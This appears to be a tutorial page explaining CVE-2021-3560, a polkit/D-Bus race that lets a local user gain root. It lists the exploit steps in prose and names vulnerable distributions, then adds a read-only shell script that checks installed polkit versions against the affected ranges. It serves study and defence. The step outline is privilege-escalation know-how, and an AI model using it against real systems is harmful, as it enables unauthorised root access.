D-Bus Authentication Bypass
CVE-2021-3560
The vulnerability can be boiled down to these steps:

1. The attacker manually sends a dbus message to the accounts-daemon requesting the creation of a new account with sudo permissions (or latterly, a password to be set for the new user). This message gets given a unique ID by the dbus-daemon.
2. The attacker kills the message after polkit receives it, but before polkit has a chance to process the message. This effectively destroys the unique message ID.
3. Polkit asks the dbus-daemon for the user ID of the user who sent the message, referencing the (now deleted) message ID.
4. The dbus-daemon can't find the message ID because we killed it in step two. It handles the error by responding with an error code.
5. Polkit mishandles the error and substitutes in 0 for the user ID -- i.e. the root account of the machine.
6. Thinking that the root user requested the action, polkit allows the request to go through unchallenged.

In short, by destroying the message ID before the dbus-daemon has a chance to give polkit the correct ID, we exploit the poor error-handling in polkit to trick the utility into thinking that the request was made by the all-powerful root user.
See the full vulnerability explanation in the original article by Kevin Backhouse.

Many of the most popular Linux distributions didn't ship the vulnerable version until relatively recently. You may run the Polkit exploit against the following targets:
RHEL 8
Fedora 21 (or later)
Debian testing (“bullseye”)
Ubuntu 20.04 LTS ("Focal Fossa")
Other distributions may also be vulnerable if the installed polkit package is an affected version. Affected versions are 0.113 (or later) for RHEL, CentOS and Fedora, and 0.105-26 for Debian/Ubuntu.
Additionally, this exploit only works on distributions that have accountsservice and gnome-control-center installed.
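The following is an added defender-side check, not part of the original page or of Kevin Backhouse's work: it reads the installed polkit package version through rpm or dpkg, compares it against the affected ranges stated above (0.113 or later on the RHEL family, 0.105-26 on Debian/Ubuntu), and reports whether the two packages the page names as prerequisites (accountsservice, gnome-control-center) are present. The version thresholds are taken from the page; the package names `polkit` (rpm) and `policykit-1` (dpkg) are the standard distro names. Because distributions ship the fix as a patched build under the same upstream version, a match means "verify the package changelog for the CVE-2021-3560 backport", not "confirmed vulnerable". The function names are this example's own.

```shell
#!/bin/sh
# Added example: inventory check for the CVE-2021-3560 affected ranges.
# It only reads package metadata; it does not interact with polkit or D-Bus.

# version_ge A B -> exit 0 if dotted version A >= B, compared component-wise.
version_ge() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, "."); m = split(b, y, ".")
        k = (n > m) ? n : m
        for (i = 1; i <= k; i++) {
            xa = (i <= n) ? x[i] + 0 : 0
            yb = (i <= m) ? y[i] + 0 : 0
            if (xa > yb) exit 0
            if (xa < yb) exit 1
        }
        exit 0
    }'
}

# polkit_in_affected_range FAMILY VERSION
#   FAMILY: "rpm" (RHEL/CentOS/Fedora) or "deb" (Debian/Ubuntu)
#   exit 0 when VERSION falls in the affected range stated on the page:
#     rpm: upstream 0.113 or later (release suffix such as "-11.el8" ignored)
#     deb: package revision 0.105-26 (Ubuntu suffixes like "ubuntu1" included)
polkit_in_affected_range() {
    family=$1
    ver=$2
    case "$family" in
        rpm)
            upstream=${ver%%-*}
            version_ge "$upstream" "0.113"
            ;;
        deb)
            case "$ver" in
                0.105-26*) return 0 ;;
                *) return 1 ;;
            esac
            ;;
        *) return 2 ;;
    esac
}

# installed_polkit_version -> prints "FAMILY VERSION" for the local host,
# or nothing when neither rpm nor dpkg reports a polkit package.
installed_polkit_version() {
    if command -v rpm >/dev/null 2>&1; then
        v=$(rpm -q --qf '%{VERSION}-%{RELEASE}\n' polkit 2>/dev/null) && echo "rpm $v"
    elif command -v dpkg-query >/dev/null 2>&1; then
        v=$(dpkg-query -W -f='${Version}\n' policykit-1 2>/dev/null) && echo "deb $v"
    fi
}

# package_installed NAME -> exit 0 if rpm or dpkg knows the package.
package_installed() {
    if command -v rpm >/dev/null 2>&1; then
        rpm -q "$1" >/dev/null 2>&1
    elif command -v dpkg-query >/dev/null 2>&1; then
        dpkg-query -W "$1" >/dev/null 2>&1
    else
        return 1
    fi
}

# report_host -> human-readable summary for the machine this runs on.
report_host() {
    set -- $(installed_polkit_version)
    if [ $# -ne 2 ]; then
        echo "polkit: not found via rpm/dpkg"
        return 0
    fi
    if polkit_in_affected_range "$1" "$2"; then
        echo "polkit $2: in the affected range listed for CVE-2021-3560; verify the distro changelog for the backported fix"
    else
        echo "polkit $2: outside the listed affected range"
    fi
    for p in accountsservice gnome-control-center; do
        if package_installed "$p"; then
            echo "$p: installed (prerequisite named on the page is present)"
        else
            echo "$p: not installed"
        fi
    done
}

report_host
```

Run it as root or as any user on the host being audited; the comparison functions can also be called directly with a version string pulled from a CMDB export, which is how the check is exercised below.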